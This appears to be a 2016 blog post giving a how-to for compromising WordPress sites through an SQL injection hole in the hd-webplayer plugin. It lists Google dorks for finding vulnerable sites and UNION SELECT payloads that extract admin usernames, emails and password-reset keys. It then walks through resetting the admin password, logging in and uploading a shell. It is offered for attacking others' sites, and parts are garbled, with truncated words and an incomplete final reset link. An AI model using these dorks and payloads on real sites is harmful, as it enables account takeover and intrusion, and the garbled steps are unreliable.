Wednesday, May 18, 2016

HOW TO WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING



HOW TO WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING
First of all we need to find a vulnerable page.
We enter this in Google:
:
# Dork 1 (config.p)
inurl:"/wp-content/plugins/hd-webplayer/config.p?id="

# Dork 2 (playlist.p)
inurl:"/wp-content/plugins/hd-webplayer/playlist.p?id="

# Dork 3 (eral):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example:
:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=3


When i add ' text disapprs so it is vulnerable.

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:
:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

We pick one and copy his email.
Go to the login page of the site.
It is usually here:
:
http://www.site.com/wp-login.p

And press "Lost your ?"

Now you enter either username or email.
We can enter both so it doesn't matter.
I entered email.



Now when you got:

"Check your e-mail for the confirmation link."

It mns that reset is successfully sent.
Now we need to get the .

Go back to the syntax you used for extracting email and username and do this:
:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--


:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user__,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Voila!
Now we just need to reset it.

Go to:
:
wp-login.p?action=rp&=reset&login=username

NOTE: Replace = & login=

So my link will be:

Enter new :

Login with new and shell it.

No comments:

Post a Comment